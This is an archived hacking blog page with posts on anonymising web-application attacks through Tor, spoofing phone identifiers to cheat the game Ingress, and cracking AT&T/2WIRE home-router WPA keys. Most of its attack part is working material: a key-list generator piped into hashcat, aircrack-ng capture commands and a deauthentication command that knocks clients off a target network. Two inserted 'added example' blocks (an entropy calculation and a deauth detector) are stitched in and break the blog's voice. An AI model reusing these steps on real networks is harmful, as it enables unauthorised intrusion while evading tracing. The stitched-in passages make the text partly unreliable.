Showing posts with label hack.

WebApp pen-testing from within the deeps of TOR.

Thursday, September 12, 2013 Posted by Unknown 0 comments
Disclaimer: The following information is for educational use only. Only perform testing on your own equipment or on equipment you have permission to test. If you don't understand what TOR is, how the TOR network works, or the risks of sending information through the TOR network, you should really not follow these steps, as most likely you will fuck something up and get yourself in trouble. bitches.
/Disclaimer.

When pen-testing a web application you may need to stay anonymous. This could be for many reasons, mainly making sure your scans and testing don't trigger an investigation into the origin of the traffic.

One of the main tools I use, along with almost everyone else, is Burp Suite. They have a free version, but if you are using it for commercial purposes make sure you buy a copy, as the paid version has some really useful features (e.g. automated XSS/SQL injection testing).

Other tools of the trade: Nikto, OWASP DirBuster, NMAP, etc.

Now it's time to set up an environment in which we can use all these applications, and more, through TOR.

Install your favorite virtual machine software. I will be using VirtualBox in this blog post as it's free. However, I have VMware Workstation, which is what I mostly use.

Install your favorite Linux distro. I suggest using Xubuntu or Ubuntu Server. I will refer to this install as VMtor for the rest of this post.

Once your Linux box is running in VirtualBox, apply all updates/patches and make sure everything is running smoothly. Then install a few needed apps: curl, screen, htop, openssh-server, privoxy, default-jre (or your favorite open-source Java).

$ sudo apt-get update
$ sudo apt-get install curl screen htop openssh-server privoxy default-jre

Now on your host machine (which has to be Linux), open a terminal and SSH into VMtor with X11 forwarding. (This lets you open VMtor apps inside your host desktop.)

$ ssh -X <user>@ip_address_of_VMtor

We are going to use someone else's script to install TOR and configure iptables to forward all traffic on the machine through TOR. Download it here: https://github.com/ericpaulbishop/iptables_torify

Direct link: https://github.com/ericpaulbishop/iptables_torify/archive/master.zip

Unzip it and run the script as root:
$ sudo ./debian_install.sh

Once it's finished, open Firefox and go to https://check.torproject.org
Make sure you are on the TOR network.

Now we need to configure the local web proxy, privoxy, that you installed above.
Edit /etc/privoxy/config

Uncomment the following line:
forward-socks5  /     127.0.0.1:9050   .

Or just add it to the end of the file.

Now start the privoxy service.
$ sudo /etc/init.d/privoxy start

Privoxy listens on 127.0.0.1:8118.

I use screen so I have better control over what's running, and so applications keep running across SSH disconnects. Learn more about screen here.
$ screen -S burp
$ java -jar burpsuite_free1.5.jar
Screen command: Ctrl+A, then D to detach from the screen session.

Go to the Proxy tab and then the Options tab. Double-check that the proxy listener is set up on 127.0.0.1:8080.

Go to Options Tab along the top. Click on Add under Upstream Proxy Servers.
Leave Destination host empty
Proxy host: 127.0.0.1
Proxy port: 8118
Authentication type: None
Click OK.

Now let's open a web browser on VMtor and configure it.

$ screen -S firefox
$ firefox
Screen command: Ctrl+A, then D to detach from the screen session.

Go to Edit -> Preferences.
Advanced -> Network tab -> click on Settings...
Select Manual proxy configuration:

HTTP Proxy: 127.0.0.1 Port: 8118
SSL Proxy: 127.0.0.1 Port: 8118
FTP Proxy:  leave empty
SOCKS Host:  127.0.0.1 Port: 9050


Browse to a site. It should now be captured in Burp.

That is it.

Now any time you use an application from within VMtor, it will be routed through the TOR network.

Other Tips & Notes:

Use proxychains for nmap or zmap traffic:
http://www.commondork.com/2009/06/26/tunneling-nmap-through-tor/

Don't use the same browser on the host as you do in VMtor. For example, on my host I only use google-chrome and in VMtor I only use Firefox. This is to ensure I don't make a mistake and use the wrong browser.

Take a snapshot of your VM after you set it up.

Why not just use Tails, either directly or in a VM? Yes, it does torify everything using iptables like above. Also, it is way more secure than the setup I have suggested above, and it is a lot easier to set up and use. However, the web proxy installed in Tails won't work with Burp. I tried many nights and hours to get it to work. Also, because it's so customized, installing third-party apps like privoxy to make it work could cause unknown damage.

Use duckduckgo.com as your search engine. Google tends to block TOR connections due to abuse.

Finally, don't be stupid.

Motorola XT1080 Ingress hack.

Friday, August 23, 2013 Posted by Unknown 18 comments
Only works if your phone is rooted.

Reboot phone to make sure everything is A-okay.

Open BuildProp Editor. Grant root access for 15 minutes. (Never permanently grant root permission to apps.)

Scroll down to the ro.product.* area.

Make sure you write down the original values of each item.

Because my phone was already a Motorola phone, all I needed to change was:

 
 ro.product.model=XT1080
 ro.product.brand=motorola
 ro.product.name=obake_verizon
 ro.product.device=obake

Now, my co-worker's phone was an HTC phone. He had two .model lines, and I changed the manufacturer line as well just to be sure. Each phone will be different, so look around and see if anything else needs to be changed.

Original settings:


 ro.product.model=HTC6435LVW
 ro.product.model=DLX
 ro.product.manufacturer=HTC
 ro.product.brand=verizon_wwe
 ro.product.name=dlx
 ro.product.device=dlx

Changed to:


 ro.product.model=XT1080
 ro.product.model=XT1080
 ro.product.manufacturer=motorola
 ro.product.brand=motorola
 ro.product.name=obake_verizon
 ro.product.device=obake

Reboot your phone. (BuildProp Editor will ask if you want to reboot. Click No each time it asks; you have to reboot the phone manually at the end of the process.)

Once your phone is back up, run Ingress. You should get a shit ton of stuff.

Close Ingress completely.

Open BuildProp Editor again. Change the values back to the original settings.

Reboot your phone.

YAY! TOAST

UPDATE: Cracking 2WIRE WPA1/2

Tuesday, October 23, 2012 Posted by Unknown 0 comments

My previous post had a few problems with the script. I then updated the script to work properly: http://pastie.org/5101804 However, it was still way too slow. I asked around and found the following solution.

http://pastie.org/5104479

#Python 3
#Name: 2wire.py
#by: INIT_6
#Count from 0000000000 - 9999999999, skipping any number in which a digit repeats 3 or more times in a row (like 333)

import sys
from threading import Thread

def count1(first, ver):
    # Every 9-digit value from 999000000 upward starts with "999", so the
    # loop can stop there; everything above it would be skipped anyway.
    MAX_INT = 999000000
    # The ten rejected runs: '000', '111', ..., '999'
    BAD_PATTERNS = {x * 3 for x in '0123456789'}
    # Use xrange for Python 2.7
    for number in range(MAX_INT):
        # Zero-pad to 9 digits; `first` supplies the leading tenth digit
        int_string = str(number).rjust(9, '0')
        if any(pattern in int_string for pattern in BAD_PATTERNS):
            continue
        print ( str(first) + int_string )

if __name__ == '__main__':
    # One thread per leading digit 0-9
    for x in '0123456789':
        try:
            Thread(target=count1, args=(x,1)).start()
        except Exception as errtxt:
            print ( errtxt )


There is still some work to do. I need to test the threading better and set up a queue so it will only start as many threads as the computer can handle.

Part 2. Cracking AT&T WPA1/2

Monday, September 24, 2012 Posted by Unknown 0 comments

Part 2. Cracking AT&T WPA1/2 with python script and hashcat.

Once you have the four-way handshake from part 1:

My Python script can be found here. It creates a CPU pool based on how many cores you have. Based on Python 2.7.3 and Linux.

What the script does is count from 0000000000 to 9999999999, skipping any number that has three repeating digits in a row, so you won't have keys like 1234555678 because it repeats 5 three times. This is because AT&T decided to make their numbers "too random", cutting their key space down. It's faster to count through and skip past repeating numbers than to process each number.
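As an added example (not the post's script, and not the 2wire.py script from the 2WIRE post above), the following computes how much of the 10-digit space the "no three identical digits in a row" rule actually leaves, cross-checks the count against the same filter those scripts use, and reports the effective entropy of a key drawn from the filtered space:

```python
import itertools
import math

def survives_filter(key: str) -> bool:
    """The posts' rule: reject any key containing 'ddd' for some digit d."""
    return not any((d * 3) in key for d in '0123456789')

def count_no_triple(n: int) -> int:
    """Count digit strings of length n with no run of 3 identical digits.
    DP over the length of the trailing run: `one` = strings ending in a run
    of exactly 1, `two` = strings ending in a run of exactly 2."""
    if n <= 0:
        return 1
    one, two = 10, 0                   # length 1: ten strings, all runs of length 1
    for _ in range(n - 1):
        # append a different digit (9 choices) -> run of 1;
        # append the same digit -> run grows from 1 to 2 (3 is rejected)
        one, two = 9 * (one + two), one
    return one + two

def count_by_enumeration(n: int) -> int:
    """Brute-force cross-check of the DP with the posts' filter (small n only)."""
    return sum(1 for t in itertools.product('0123456789', repeat=n)
               if survives_filter(''.join(t)))

def surviving_fraction(n: int = 10) -> float:
    """Share of the full 10**n space that the filter keeps."""
    return count_no_triple(n) / 10 ** n

def effective_bits(n: int = 10) -> float:
    """Entropy in bits of a uniformly chosen filtered key of length n."""
    return math.log2(count_no_triple(n))

if __name__ == '__main__':
    assert count_no_triple(4) == count_by_enumeration(4)
    print(f"10-digit keys with no triple: {count_no_triple(10):,}")
    print(f"fraction of the full space kept: {surviving_fraction():.3f}")
    print(f"effective entropy: {effective_bits():.2f} bits "
          f"(full 10-digit space: {math.log2(10 ** 10):.2f} bits)")
```

About 93% of the 10-digit space survives the rule, so it removes only about a tenth of a bit; the real weakness is a 33-bit all-digit default key, which is why such defaults should be replaced with a long random passphrase.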

To change where the program starts, open it and change the following line to whatever you want:

start = str(7)

To run the program, pipe it into hashcat-plus:

python 2wireWPAiter.py | ./oclHashcat-plus64.bin -m 2500 -a 0 --gpu-accel=160 --gpu-loops=1024 ../dir/2WIREHandShake.hccap


With AMD driver 12.8 and SDK 2.7 I get about 86K keys per second. With the built-in brute force I get 114K keys per second. Still working on how to improve my output speed.

To get more info on hashcat look here.

Straight brute force on a known key starting with 7 saved over an hour.

Screenshots: with script / without script.


Someone in the hashcat room just told me a better way of doing this to make it even faster and more accurate: using http://hashcat.net/wiki/doku.php?id=statsprocessor to make a hcstat file, utilizing Markov chains. I will do this later tonight and post my results.

Edit: you can't use Markov chains with hashcat for this.

PART 1: Cracking AT&T WPA1/2

Posted by Unknown 0 comments
Part 1. Getting the handshake.

Aircrack's site has a pretty good tutorial.

Boot from BackTrack 5 R3.

First you want to see what kind of Wi-Fi networks you have to choose from. Start your wireless interface in monitor mode:

#airmon-zc start wlan0
#airodump-ng --encrypt wpa mon0 

You should see several APs. Record the BSSID and channel, along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple of targets on the same channel, you need to close airodump and stop airmon:

#airmon-zc stop mon0

Start airmon-zc on the channel of the target:

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options:

#airodump-ng mon0 --encrypt wpa --write FILENAME --output-format pcap -a --channel <Channel number>

The channel number needs to be the same as your target's so you can get the full four-way handshake between the client and the AP. Airodump should show it in the top right-hand corner once you get a handshake.

Instead of waiting around for a client to connect, you can deauthenticate a client and wait for it to auto-reconnect.

#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0


Where:
  • -0 means deauthentication
  • 5 is the number of deauths to send
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
  • mon0 is the interface name
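From the defender's side, a burst of deauthentication frames like the one the command above produces is easy to spot in a monitor-mode capture. The following is an added example (not from the post or from aircrack-ng): a minimal parser for the 802.11 management-frame header that flags repeated deauths between the same pair of addresses. The frames, timestamps and locally administered MAC addresses are constructed inline; a real detector would read them from a pcap after stripping the radiotap header.

```python
import struct
from collections import defaultdict

DEAUTH = (0, 12)  # 802.11 type 0 (management), subtype 12 (deauthentication)

def mac(raw):
    return ':'.join('%02x' % b for b in raw)

def parse_mgmt(frame):
    """Parse the 24-byte 802.11 MAC header of a management frame (no radiotap)."""
    if len(frame) < 24:
        return None
    fc = frame[0]                    # frame-control byte 0: version | type | subtype
    return {'type': (fc >> 2) & 0x3, 'subtype': (fc >> 4) & 0xF,
            'dst': mac(frame[4:10]), 'src': mac(frame[10:16]),
            'bssid': mac(frame[16:22]), 'body': frame[24:]}

def deauth_bursts(frames, threshold=3, window=1.0):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes).
    Returns [(src, dst, n)] for every address pair that sent at least
    `threshold` deauth frames inside some `window`-second interval."""
    times = defaultdict(list)
    for ts, raw in frames:
        p = parse_mgmt(raw)
        if p and (p['type'], p['subtype']) == DEAUTH:
            times[(p['src'], p['dst'])].append(ts)
    alerts = []
    for (src, dst), stamps in times.items():
        stamps.sort()
        best, j = 0, 0
        for i, t in enumerate(stamps):          # sliding window over sorted timestamps
            while t - stamps[j] > window:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            alerts.append((src, dst, best))
    return alerts

def build_frame(subtype, dst, src, bssid, body_word=7):
    """Constructed management frame: FC (type 0), duration, addr1-3, seq ctrl,
    then a 2-byte body (reason code 7 for a deauth; irrelevant for the beacon)."""
    header = bytes([subtype << 4, 0]) + b'\x00\x00' + dst + src + bssid + b'\x00\x00'
    return header + struct.pack('<H', body_word)

# Constructed sample capture: locally administered MACs, not real devices.
AP, CLIENT = bytes.fromhex('020000000001'), bytes.fromhex('020000000002')
SAMPLE = [(0.0, build_frame(8, b'\xff' * 6, AP, AP))]                     # one beacon
SAMPLE += [(0.1 * i, build_frame(12, CLIENT, AP, AP)) for i in range(5)]  # 5 deauths in 0.4 s
SAMPLE.append((30.0, build_frame(12, AP, CLIENT, AP)))                    # one isolated deauth

if __name__ == '__main__':
    for src, dst, n in deauth_bursts(SAMPLE):
        print(f"deauth burst: {n} frames from {src} to {dst}")
```

A wireless IDS applies the same idea: a single deauth is normal, several within a second from one sender to one receiver is the signature to alert on.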

If you are using BackTrack you can easily check your .pcap file to see if it has a proper handshake by using pyrit, or you can load up Wireshark and run a filter for EAPOL, which I will show in a future post.

#pyrit -r FILENAME.pcap analyze 

The output should tell you if you have a good EAPOL handshake, a workable one, or nothing at all if none is found.

To strip everything out of your pcap file except your handshakes, run the following:

#pyrit -r FILENAME.pcap -o OUTPUT.pcap strip

To turn your pcap file into a hashcat-plus-friendly file, you can upload it to https://hashcat.net/cap2hccap/ or follow the steps they give to convert it yourself. I just use their site.


HACKING WPA w/ PYRIT

Monday, June 25, 2012 Posted by Unknown 0 comments
Getting Pyrit to work with OpenCL and a PostgreSQL database, on Kubuntu 12.04 with an AMD Radeon HD 7950 card.


You have to install the AMD Catalyst drivers and the AMD SDK. Make sure you install whichever one is older first, then the newer one, so you don't corrupt your install. This will change as they update the Catalyst drivers and the SDK at different times.


Go to AMD and download and install the drivers for your card: here
This page will help you install your drivers: here


Restart after install.


Download the latest SDK: here
This page will help you install your SDK: here


Restart after install.


name@box$: env


Check and make sure you have the following:


AMDAPPSDKROOT=/opt/AMDAPP/
LD_LIBRARY_PATH=/opt/AMDAPP/lib


Make sure everything is running correctly by running the following.
This has to be run as a normal user; the application doesn't work as root.
name@box$: fglrxinfo

Some dependencies that I ran into. This list may not be complete.

apt-get install cmake libroot-python-dev libboost1.40-all-dev subversion libpcap-dev libssl-dev python-dev zlib1g-dev python-scapy libpcap0.8-dev libpq-dev 


Install the easy_install function. Follow the steps here.
Now you can run:


name@box$: sudo easy_install SQLAlchemy
name@box$: sudo easy_install psycopg2



Now we are ready to install pyrit.


name@box$: wget https://pyrit.googlecode.com/files/pyrit-0.4.0.tar.gz
name@box$: wget https://pyrit.googlecode.com/files/cpyrit-opencl-0.4.0.tar.gz


name@box$ tar xvzf pyrit-0.4.0.tar.gz
name@box$ tar xvzf cpyrit-opencl-0.4.0.tar.gz


name@box$ cd pyrit-0.4.0
name@box$ sudo python setup.py build
name@box$ sudo python setup.py install


name@box$ cd ../cpyrit-opencl-0.4.0
name@box$ nano setup.py


You need to edit the setup.py file to match the below:




LIBRARIES.append('OpenCL')
try:
    if os.path.exists(os.environ['AMDAPPSDKROOT']):
        OPENCL_INC_DIRS.append(os.path.join(os.environ['AMDAPPSDKROOT'], 'include'))
        for path in ('lib/x86_64', 'lib/x86'):
            if os.path.exists(os.path.join(os.environ['AMDAPPSDKROOT'], path)):
                OPENCL_LIB_DIRS.append(os.path.join(os.environ['AMDAPPSDKROOT'], path))
                break
except:
    pass
for path in ('/opt/AMDAPP/include', '/opt/AMDAPP/include/CL'):


ctrl+o to save
ctrl+x to exit


name@box$ sudo python setup.py build
name@box$ sudo python setup.py install




Install PostgreSQL 9 from its website.
Install pgadmin3 from the Ubuntu Software Center.


Set up a new user and database:
User:2wire 
password: putitinme  
Database: 2wireDB


To have pyrit connect to your database, do the following:
name@box$ pyrit -u postgresql://2wire:putitinme@127.0.0.1/2wireDB [pyrit command]


Now, if you don't want to type out all that nonsense each time, edit the following file:


name@box$ nano ~/.pyrit/config


Change where it says file:// to read postgresql://2wire:putitinme@127.0.0.1/2wireDB


Ctrl+o to save
Ctrl+x to exit


Now you can simply run pyrit:


name@box$ pyrit [pyrit command]


Now it will automatically connect to the database. 


I might have left out a few steps. If you run across this page and need some help, feel free to hit me up. I know pages just like this helped me install pyrit.


Weaponizing the Teensy Slides

Thursday, September 15, 2011 Posted by Unknown 0 comments